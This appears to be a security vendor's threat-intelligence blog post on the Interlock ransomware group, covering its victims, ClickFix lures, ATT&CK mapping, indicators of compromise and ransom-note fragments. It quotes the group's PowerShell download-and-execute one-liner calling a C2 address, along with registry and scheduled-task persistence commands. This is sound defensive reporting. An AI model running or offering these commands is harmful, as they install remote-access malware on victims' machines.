Executive Summary
A relatively new ransomware group, Interlock, has gained traction in 2025 as an opportunistic ransomware operator that leverages compromised websites and multi-stage social engineering techniques to deliver their payloads.
First observed in September 2024, Interlock departs from the traditional Ransomware-as-a-Service (RaaS) model, operating without affiliates or public advertisements. The financially-motivated group conducts opportunistic double extortion campaigns, relying on a private infrastructure and a custom leak site—“Worldwide Secrets Blog“—to pressure victims with the threat of publicly exposing sensitive data.
In this blog, we’ll examine Interlock’s most common attack methods and provide tips on how to protect your organization.
Key Points
- Interlock is an opportunistic ransomware actor, known for obtaining initial access via compromised websites and social engineering techniques.
- In August 2025, Interlock claimed responsibility for the July 2025 ransomware attack against the City of St. Paul, Minnesota.
- Interlock makes frequent use of the “ClickFix” technique, where unwitting targets are sent to compromised websites and asked to “prove they are human” by pressing keys that (unbeknownst to them) cause their device to download malware such as remote access trojans (RATs).
- Interlock carries out double extortion attacks, first exfiltrating then encrypting data. Targets who do not pay the ransom are posted on their leak site, typically with the name of the victim, amount of data stolen, number of files and folders, and a link to the victim’s website (if applicable).
What is Interlock Ransomware?
The Interlock ransomware group (also known as Nefarious Mantis) was first observed in September 2024 and has emerged as a high priority threat in recent months. Over the past 11 months, they have targeted businesses and critical infrastructure sectors across North America and Europe, including education, healthcare, technology, and government entities. In June 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and FBI warned of increased Interlock ransomware activity.
The group is financially motivated, and according to the FBI, is opportunistic when selecting targets. Unlike many modern ransomware groups, Interlock does not follow a typical RaaS model and likely operates as a closed group.
Historically, Interlock ransomware has obtained initial access via drive-by downloads from compromised legitimate websites, an infection chain not typically associated with ransomware actors. In May 2025, the group added the ClickFix social engineering technique to their arsenal.
Interlock’s encryption payload is typically deployed across virtual machines, leaving hosts, workstations, and physical servers unaffected.
Open-source reporting has detailed similarities between the Rhysida and Interlock ransomware variants. CISA’s advisory on Rhysida can be found here. There is evidence to suggest that Interlock may have emerged as a spinoff group from Rhysida, although this has not been definitively proven to date.
Recent Interlock Attacks
On July 22, 2025, CISA and the FBI in combination with other federal agencies issued a joint advisory warning that Interlock had recently upgraded its malware, making it more resistant to detection. The advisory cautioned that the FBI had “encountered Interlock ransomware encryptors designed for both Windows and Linux operating systems,” and that these encryptors have been observed encrypting virtual machines (VMs) across both operating systems.
To date, at least 58 known victims have been posted to Interlock’s leak site. The most-high impact attack to date was the DaVita breach in April 2025, stealing 1.5 terabytes of data and affecting 200,000+ patients of the kidney dialysis service provider.
On August 11, 2025, Interlock claimed responsibility for the July 2025 ransomware attack on the city of St. Paul, Minnesota, which took key city systems offline and put the personal data of 3,500 city employees potentially at risk. 10 days prior to the attack, cyber threat intelligence company PRODAFT claimed they had detected Interlock pre-attack activity in the city’s systems, warning on X (formerly Twitter) that this activity had a “certain likelihood of spreading.” The city has since confirmed the attack was perpetrated by Interlock, but stated it did not pay the ransom demand.
In a recent interview with Fox 9 Minneapolis-St. Paul news (KMSP-TV), Arctic Wolf® President of Technology and Services Dan Schiappa spoke about how the St. Paul attack could have occurred.
“Typically, these ransomware groups try and go after infrastructure [because] they get the most ransomware dollars out of that. This is typically something that a hacking group would do reconnaissance on – they understand the value of the data. They would find the weak points in the ecosystem, then once they’ve gathered all that information, they launch the campaign. We have to take these types of attacks very seriously.”
Interlock Attack Chain Analysis
To gain an initial foothold, the Interlock ransomware group utilizes the increasingly common trend of combining stealthy, user-initiated infection chains with living-off-the-land (LOTL) techniques. Variations on this technique, including ClickFix and FileFix, typically use legitimate activity to mask malicious behavior, aiming to evade traditional endpoint detection solutions and network monitoring tools.
One of the reasons why this type of threat activity is so effective is that the malicious instructions are hosted on compromised websites that are often already trusted by victims, making them more likely to follow through on installing the malware when prompted.
Initial Access
Interlock employs deceptive tactics to deliver its initial payloads, most notably via the use of fake software updaters hosted on compromised websites. These are crafted using PyInstaller to mimic legitimate software like Google Chrome or Microsoft Edge.
When a user manually follows the instructions shown on one of these fake update websites, a legitimate installer for Chrome or Edge runs as a decoy, while a malicious PowerShell script is silently run in the background. The script acts as a first-stage backdoor, persistently communicating with command-and-control (C2) servers, gathering detailed system information, and enabling follow-on activity.
This is a social engineering technique commonly referred to as ClickFix, which relies on users being tricked by threat actors into running malicious commands, often under the pretext of updating existing software. False dialog boxes instruct the user to use popular Windows shortcuts such as “Windows + R” (run) then “CTRL + V” (paste) to unwittingly paste and run harmful PowerShell commands, thus circumventing traditional security defenses and compromising their own systems.
The use of this ClickFix technique has been observed in several other malware campaigns, including those by Lumma Stealer (aka LummaC2 stealer), AsyncRAT, DanaBot, and DarkGate.
Figure 1: ClickFix fake updater dialog prompts users to manually execute PowerShell command.
(Source: Sekoia.io)
Execution and Obfuscation
Once manually executed by victims, the PowerShell backdoor operates stealthily, running in the background by relaunching itself in a detached mode to avoid detection by the user. It continuously polls remote hosts using HTTP requests, with fallback mechanisms between domains and IP addresses.
A significant amount of variation has been observed among the PowerShell commands executed in recent ClickFix social engineering campaigns, often employing techniques to evade detections that rely on string matching. Obfuscation techniques include the use of character codes, plus characters, caret characters, and asterisk characters. Most often, these commands make use of built in download and execution functions like Invoke-RestMethod, Invoke-Expression, and their corresponding aliases. Malicious URLs in these commands use malicious domains, legitimate domains used maliciously such as trycloudflare.com, and IPv4 addresses directly.
This collects data such as system information, user privileges, running processes, services, and network configuration, which it obfuscates and compresses before exfiltrating to a designated C2 endpoint. The C2 can then issue commands, including delivering executable or DLL payloads, which are decoded and saved locally. Interlock has historically used multiple tools, including Cobalt Strike, Interlock RAT, NodeSnake RAT, and SystemBC for C2 communication and command execution.
| PowerShell.exe -w h -c “iex $(irm 138[.]199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime](’01/01/’ + ‘1970’)); $x = ($z – $y).TotalSeconds; $w = [math]::Floor($x); $v = $w – ($w %% 16); [int64]$v))” |
Figure 2: Example of a malicious PowerShell script, which victims are tricked into executing.
Persistence is established in later script versions (up to v11) through Windows registry keys, and the script can receive and execute arbitrary commands from the threat actor.
All known C2 infrastructure used by this backdoor abuses Cloudflare’s “TryCloudflare” tunneling tool, using dynamically generated subdomains to obfuscate traffic and evade traditional detection methods. Developers commonly use TryCloudflare to experiment with Cloudflare Tunnel without adding a site to Cloudflare’s DNS, but it has been used in the past to deliver malware. These dynamic and ephemeral domains appear legitimate and act as temporary proxies, making it more difficult to trace or block malicious communication.
This misuse of trusted platforms highlights a growing trend among more sophisticated actors to blend in with legitimate services, challenging defenders’ ability to distinguish malicious traffic from benign.
Detection Evasion
Recent observations confirm that Interlock has incorporated a custom PowerShell-based remote access trojan (RAT) into its initial access toolkit, delivered via fake software updaters hosted on compromised websites. The PowerShell RAT operates persistently in detached mode without a visible window, collecting detailed host data and enabling remote command execution and payload delivery.
Figure 3: Interlock’s leak site, “Worldwide Secrets Blog”.
Figure 4: On August 11, 2025, the City of Saint Paul was officially listed on Interlock’s leak site.
How Arctic Wolf Protects Its Customers
When active campaigns are identified, we move quickly to protect our customers. Arctic Wolf Labs has leveraged threat intelligence around Interlock’s activity to implement new detections in the Arctic Wolf® Aurora™ Platform to protect customers.
As we discover new information, we will enhance our detections to account for additional IOCs and techniques leveraged by this threat group.
Our Commitment to the Fight Against Ransomware
Arctic Wolf is committed to the fight against ransomware, and as such we are proud to stand alongside the 68 members of the International Counter Ransomware Initiative (CRI), the world’s largest international cyber partnership. As a global leader in security operations, Arctic Wolf’s mission is to help protect governments, businesses, and safety-critical institutions of all sizes from cyber threats.
We’re delighted to have been selected to co-chair the CRI’s new Public-Private Sector Advisory Panel, led by Public Safety Canada, which establishes a trusted set of private sector partners for CRI members to rely on when responding to ransomware attacks.
We look forward to collaborating with CRI members in combating ransomware by catalyzing effective information sharing, building trust through clear expectations and person to person collaboration, and developing best practices to navigate practical hurdles to combating ransomware.
Conclusion
Though not the newest ransomware group within the threat landscape, Interlock’s steady rise to prominence over the course of 2025 means that organizations should take heed of CISA’s warnings and implement their mitigation suggestions, which are outlined in our Recommendations section below.
The proliferation of the Interlock RAT malware delivered through compromised websites earned the group enough notoriety to warrant a warning from CISA and the FBI in June; the group’s most recent attack on the City of Saint Paul represents a direct escalation of this trend. It indicates the group is becoming confident enough in its activities to go after targets it feels can pay out higher-dollar ransom demands, even if that means endangering vital city infrastructure.
From a defensive standpoint, Arctic Wolf will continue to actively monitor this group for further cybersecurity threats. Financially driven groups like Interlock value impact and disruption as their main goals, with few qualms in targeting both private and government entities in the hopes of securing a large payout. It’s highly likely the group will continue targeting high-profile organizations for financial gain in the coming months.
Recommendations
While user training to help employees detect the red flags of a social engineering attack is a good place to start mitigating this threat, the reality is that even the most security-conscious user still can – and do – fall victim to these types of attacks.
To provide a good solid baseline of security to guard against the type of attacks perpetuated by opportunistic threat actors like Interlock, the following recommendations from CISA will go a long way in defending your organization:
- Prevent initial access by implementing domain name system (DNS) filtering and web access firewalls, and training users to spot phishing attempts.
- Blocking tunneling tools and domains related to services such as TryCloudflare in environments where they are not used for operational purposes.
- Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up to date.
- Segment networks wherever possible to restrict lateral movement from initial infected devices to other devices in the same organization.
- Implement identity, credential, and access management (ICAM) policies across the organization.
- Have an incident response (IR) plan ready, and ensure you have an incident response group that you can reach out to or enable should the need arise.
- Endpoint Detection and Response (EDR) platforms can uncover hidden red flags of intrusion and can even prevent attackers gaining an initial foothold in the first place. Consider implementing enterprise solutions such as Arctic Wolf® Aurora™ Endpoint Defense.
- Require multi-factor authentication (MFA) for all services, particularly for webmail, VPN, and accounts that access critical systems.
- Check out our recommendations on how to defend your organization against Interlock’s FileFix delivery method in our latest blog.
Threat Actor Summary
| Threat Actor: |
|
| Target Locations |
|
| Targeted Sectors |
|
| Infrastructure Used |
|
| Actor Motivation |
|
Detailed MITRE ATT&CK® Mapping
| Tactic | Technique | Sub-Technique | Procedure |
| Initial Access | T1204.002 – User Execution | Malicious File | Victims are tricked into downloading and executing fake software updaters hosted on compromised websites. |
| Execution | T1059.001 – Command and Scripting Interpreter | PowerShell | A malicious PowerShell script is executed alongside a legitimate installer when the fake updater is launched by the user. |
| Persistence | T1547.001 – Registry Run Keys/Startup Folder | Registry Key Modification | The PowerShell RAT creates a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to achieve persistence. |
| Privilege Escalation | T1033 – System Owner/ User Discovery | – | Script collects user context (SYSTEM, Admin, User) using WindowsIdentity commands. |
| Discovery | T1082 – System Information Discovery | – | Collects system information via systeminfo. |
| Discovery | T1057 – Process Discovery | – | Uses tasklist /svc to enumerate running processes and services. |
| Discovery | T1007 – System Service Discovery | – | Uses Get-Service to enumerate active services. |
| Discovery | T1083 – File and Directory Discovery | – | Uses Get-PSDrive to enumerate available drives. |
| Discovery | T1016 – System Network Configuration Discovery | – | Uses arp -a to gather ARP table/network info. |
| Command and Control | T1071.001 – Application Layer Protocol | Web Protocols | Communicates with C2 via HTTP POST requests to /init1234. |
| Command and Control | T1095 – Non-Application Layer Protocol | – | Uses fallback between domain and direct IP addresses for communication redundancy. |
| Defense Evasion | T1140 – Deobfuscate/ Decode Files or Information | – | Exfiltrated data is XOR-encoded and Gzip-compressed before being sent to the C2 server. |
| Defense Evasion | T1027 – Obfuscated Files or Information | – | Uses encoding (XOR), compression (Gzip), and subdomain abuse of trycloudflare to evade detection. |
| Defense Evasion | T1218.011 – System Binary Proxy Execution | Rundll32 | Executes downloaded DLL payloads using rundll32. |
| Defense Evasion | T1562.001 – Impair Defenses | Disable or Modify Tools | PowerShell script attempts to avoid visual execution by relaunching itself in detached mode to remain hidden from the user. |
| Collection | T1005 – Data from Local System | – | Collects detailed host information including user, services, processes, network config, and drive data. |
| Execution | T1059 – Command and Scripting Interpreter | – | Later versions support execution of arbitrary Windows commands received from the C2 server. |
| Persistence | T1053.005 – Scheduled Task/Job | Scheduled Task | (Implied from registry-based startup behavior; scheduled execution could be an alternative method in future variants.) |
Indicators of Compromise (IOCs)
Malware
| Name | Hash Type | File Hash | Details | First Reported | Source |
| dodgy.js | SHA-256 | 2acaa9856ee58537c06cc2858fd71b860f53219504e6756faa3812019b5df5a6 | 02/21/2025 | Arctic Wolf | |
| SHA-256 | 0b47e53f2ada0555588aa8a6a4491e14d7b2528c9a829ebb6f7e9463963cd0e4 | 03/27/2025 | Arctic Wolf | ||
| 12341234 | SHA-256 | 7501623230eef2f6125dcf5b5d867991bdf333d878706d77c1690b632195c3ff | ClickFix PowerShell Loader | 04/17/2025 | Arctic Wolf |
| SHA-256 | 3e4407dfd827714a66e25c2baccefd915233eeec8fb093257e458f4153778bee | Interlock RAT | 03/27/2025 | Arctic Wolf | |
| SHA-256 | 0b47e53f2ada0555588aa8a6a4491e14d7b2528c9a829ebb6f7e9463963cd0e4 | Interlock RAT | 03/27/2025 | Arctic Wolf | |
| SHA-256 | fcdbe8f6204919f94fd57309806f5609ae88ae1bbd000d6226f25d2200cf6d47 | Interlock RAT | 03/27/2025 | Arctic Wolf | |
| budget | SHA-256 | 61d092e5c7c8200377a8bd9c10288c2766186a11153dcaa04ae9d1200db7b1c5 | Interlock RAT | 02/27/2025 | Arctic Wolf |
| chst.sh | SHA-1 | 6b4bdffdd5734842120e1772d1c81ee7bd99c2f1 | ESXi Interlock Ransomware Script | 04/23/2025 | Arctic Wolf |
| conhost | SHA-1 | 9256cc0ec4607becf8e72d6d416bf9e6da0e03dd | ESXi Interlock Ransomware Script | 04/23/2025 | Arctic Wolf |
| conhost.exe | SHA-1 | bd19b3ccfb5220b53acff5474a7f63b95775a2c7 | Interlock Ransomware | 04/23/2025 | Arctic Wolf |
| complexion
| SHA-256
| 6b72706fe0a0d2192d578e9e754d0e3f5715154a41bd18f80b32adcffad26522
| Interlock RAT
| 05/19/2025
| Arctic Wolf
|
| SHA-256
| 60d95d385e76bb83d38d713887d2fa311b4ecd9c5013882cd648afdeeb5dc7c3 | Interlock RAT
| 07/28/2025 | Arctic Wolf | |
| SHA-256 | e40e82b77019edca06c7760b6133c6cc481d9a22585dd80bce393f0bfbe47a99 | Interlock RAT | 06/30/2025 | Arctic Wolf | |
| SHA-256 | 0dd67fa3129acbf191eeb683fb164074cc1ba5d7bce286e0cc5ad47cc0bbcef0 | Interlock RAT
| 06/30/2025 | Arctic Wolf | |
| SHA-256 | b28a9062100a7fbf0f65dbb23db319717c4e613e890d0a3f1ae27ec6e34cf35a
| Interlock RAT
| 06/30/2025
| Arctic Wolf |
Network
| Network Artifact | Details | Intrusion Phase | First Reported | Source |
| 168.119.96[.]41 | Backdoor C2 | Command and Control | 02/25/2025 | Arctic Wolf |
| 95.217.22[.]175 | Backdoor C2 | Command and Control | 02/25/2025 | Arctic Wolf |
| 178.156.129[.]27 | Backdoor C2 | Command and Control | 02/25/2025 | Arctic Wolf |
| Cluders[.]org | Suspicious domain connected to Interlock ransomware | Initial Access | 04/30/2025 | Arctic Wolf |
| Bronxy[.]cc | Suspicious domain connected to Interlock ransomware | Initial Access | 05/02/2025 | Arctic Wolf |
| fake-domain-1892572220[.]com | Suspicious domain connected to Interlock ransomware | Initial Access | 04/22/2025 | Arctic Wolf |
| Basiclock[.]cc | Suspicious domain connected to Interlock ransomware | Initial Access | 04/30/2025 | Arctic Wolf |
| Dijoin[.]org | Suspicious domain connected to Interlock ransomware | Initial Access | 05/02/2025 | Arctic Wolf |
| Playiro[.]net | Suspicious domain connected to Interlock ransomware | Initial Access | 04/30/2025 | Arctic Wolf |
| Doriot[.]info | Suspicious domain connected to Interlock ransomware | Initial Access | 05/02/2025 | Arctic Wolf |
| Kingrouder[.]tech | Suspicious domain connected to Interlock ransomware | Initial Access | 04/30/2025 | Arctic Wolf |
| Peasplecore[.]net | Suspicious domain connected to Interlock ransomware | Initial Access | 05/01/2025 | Arcic Wolf |
| Dashes[.]cc | Payload Server | Initial Access | 04/30/2025 | Arctic Wolf |
| Nettixx[.]com | Compromised WordPress Site | Initial Access | 04/30/2025 | Arctic Wolf |
| 159.69.3[.]151 | C2 | Command and Control | 04/02/2025 | Arctic Wolf |
| 128.140.120[.]188 | C2 | Command and Control | 06/30/2025 | Esentire |
| 177.136.225[.]135 | C2 | Command and Control | 06/30/2025 | Esentire
|
| 167.235.235[.]151 | C2 | Command and Control | 06/30/2025 | Esentire
|
| 216.245.184[.]181 | C2 | Command and Control | 04/02/2025 | Arctic Wolf |
| fake-domain-1892572220[.]com | C2 | Command and Control | 04/21/2025 | Arctic Wolf |
| 5.161.225[.]197 | Backdoor C2 | Command and Control | 04/21/2025 | Arctic Wolf |
| 91.99.10[.]54 | C2 | Command and Control | 04/28/2025 | Arctic Wolf |
| 138.199.156[.]22 | C2 | Command and Control | 04/28/2025 | Arctic Wolf
|
| 128.140.120[.]188 | C2 | Command and Control | 05/19/2025 | Arctic Wolf |
| 188.34.195[.]44 | C2 | Command and Control | 04/30/2025 | Arctic Wolf |
| 45.61.136[.]202 | C2 | Command and Control | 04/30/2025 | Arctic Wolf |
| 49.12.69[.]80 | C2 | Command and Control | 04/30/2025 | Arctic Wolf |
| 212.237.217[.]182 | C2 | Command and Control | 06/10/2025 | Arctic Wolf |
| 177.136.225[.]135 | C2 | Command and Control | 06/03/2025 | Arctic Wolf
|
| 216.245.184[.]181 | C2 | Command and Control | 06/10/2025 | Arctic Wolf
|
| 193.149.180[.]58 | C2 | Command and Control | 04/30/2025 | Arctic Wolf
|
| 188.34.195[.]44 | C2 | Command and Control | 06/10/2025 | Arctic Wolf
|
| 138.199.156[.]22 | C2 | Command and Control | 04/30/2025 | Arctic Wolf
|
| 128.140.120[.]188 | C2 | Command and Control | 05/20/2025 | Arctic Wolf
|
| 192.64.86[.]175 | C2 | Command and Control | 04/30/2025 | Arctic Wolf
|
| 91.99.10[.]54 | C2 | Command and Control | 04/30/2025 | Arctic Wolf
|
| 5.161.225[.]197 | C2 | Command and Control | 04/30/2025 | Arctic Wolf
|
| 168.119.96[.]41 | C2 | Command and Control | 06/10/2025 | Arctic Wolf
|
System Artifacts
| Host Artifact | Details | Source |
| PowerShell.exe -w h -c “iex $(irm 138[.]199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime](’01/01/’ + ‘1970’)); $x = ($z – $y).TotalSeconds; $w = [math]::Floor($x); $v = $w – ($w %% 16); [int64]$v))” | Arctic Wolf | |
| reg add \”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\” /v \”ChromeUpdater\” /t REG_SZ /d \”C:\\Users\\ | Registry Key Used to Establish Persistence | Arctic Wolf |
| schtasks /create /sc DAILY /tn “TaskSystem” /tr “cmd /C cd %s && %s” /st 20:00 /ru system > nul | Scheduled Task | Arctic Wolf |
| C:\\Users\\ | Arctic Wolf | |
| HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v 0neDrive /t REG_SZ /d | Registry Key | Arctic Wolf |
| HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\” /v \”ChromeUpdater\ | Registry Key | Arctic Wolf |
Interlock Ransom Notes
Initial Ransom Note
Filename: !__README__!.txt INTERLOCK – CRITICAL SECURITY ALERT To Whom It May Concern, THE CURRENT SITUATION WHAT YOU NEED TO DO NOW Access Point: DO NOT ATTEMPT: HOW DID THIS HAPPEN? YOUR OPTIONS #2. Cooperate With Us: FINAL REMINDER CONTACT US SECURELY |
“Final Warning” Ransom Note
Filename: FIRST_READ_ME.txt Final Warning: Your Data Is at Risk 1. Access our Recovery Platform via TOR Browser: [REDACTED] 2. Alternative Access for Regular Browsers: Time is of the essence. Every hour of inaction increases the likelihood of devastating consequences. Make the right decision secure your future by cooperating with us now. |
About the Authors
Arctic Wolf Threat Research
The Arctic Wolf Threat Research team actively investigates attacks and vulnerabilities to help our customers detect, mitigate, and respond to them, as well as increase their cybersecurity awareness. Arctic Wolf Threat Research brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.
Arctic Wolf Labs
Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence and machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.
